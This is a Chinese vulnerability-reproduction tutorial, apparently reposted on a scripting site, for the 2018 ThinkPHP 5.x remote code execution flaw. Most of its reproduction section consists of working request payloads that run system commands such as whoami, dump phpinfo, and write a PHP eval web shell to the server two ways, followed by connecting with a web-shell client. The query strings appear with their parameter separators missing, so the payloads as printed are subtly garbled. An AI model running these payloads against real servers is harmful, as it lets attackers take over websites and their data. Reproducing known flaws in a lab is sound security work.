一、漏洞描述
2018年12月10日,ThinkPHP官方發布了安全更新,其中修復了ThinkPHP5框架的一個高危漏洞:
https://blog.thinkphp.cn/869075
漏洞的原因是由于框架對控制器名沒有進行足夠的檢測,導致在沒有開啟強制路由(默認未開啟)的情況下可能導致遠程代碼執行,受影響的版本包括5.0和5.1。
二、漏洞影響版本
Thinkphp 5.x-Thinkphp 5.1.31
Thinkphp 5.0.x=5.0.23
三、漏洞復現
1、官網下載Thinkphp 5.0.22,下載地址: http://www.thinkphp.cn/donate/download/id/1260.html
2、使用phpstudy搭建環境,解壓下載的Thinkphp5.0.22到網站目錄下,瀏覽器訪問http://192.168.10.171/thinkphp5.0.22/public
3、利用system函數遠程命令執行
Payload如下:
?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=whoami
4、通過phpinfo函數查看phpinfo()的信息
Payload如下:
?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=phpinfovars[1][]=1
5、寫入shell
Payload如下:
?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=echo ^?php @eval($_POST[cmd]);?^> >shell.php
注意:需要對特殊字符使用^轉義(cmd環境下轉義方式),windows環境的echo命令輸出字符串到文檔不用引號(單引號、雙引號),部分字符url編碼不編碼都行。
6、查看是否成功寫入shell
7、菜刀連接
8、第二種的寫入shell的方法
Payload如下:
?s=index/think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=../test.phpvars[1][]=?php @eval($_POST[test]);?>
9、查看是否成功寫入文件
10、菜刀連接
總結
以上所述是小編給大家介紹的ThinkPHP 5.x遠程命令執行漏洞復現,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回復大家的。在此也非常感謝大家對腳本之家網站的支持!
如果你覺得本文對你有幫助,歡迎轉載,煩請注明出處,謝謝!
您可能感興趣的文章:- ThinkPHP框架任意代碼執行漏洞的利用及其修復方法
- 對于ThinkPHP框架早期版本的一個SQL注入漏洞詳細分析
- ThinkPHP的標簽制作實例講解
- thinkphp的鉤子的兩種配置和兩種調用方法
- phpstudy的安裝及ThinkPHP框架的搭建圖文講解
- ThinkPHP6.0 重寫URL去掉Index.php的解決方法
- ThinkPHP6通過Ucenter實現注冊登錄的示例代碼
- Thinkphp5+Redis實現商品秒殺代碼實例講解
- 如何從防護角度看Thinkphp歷史漏洞
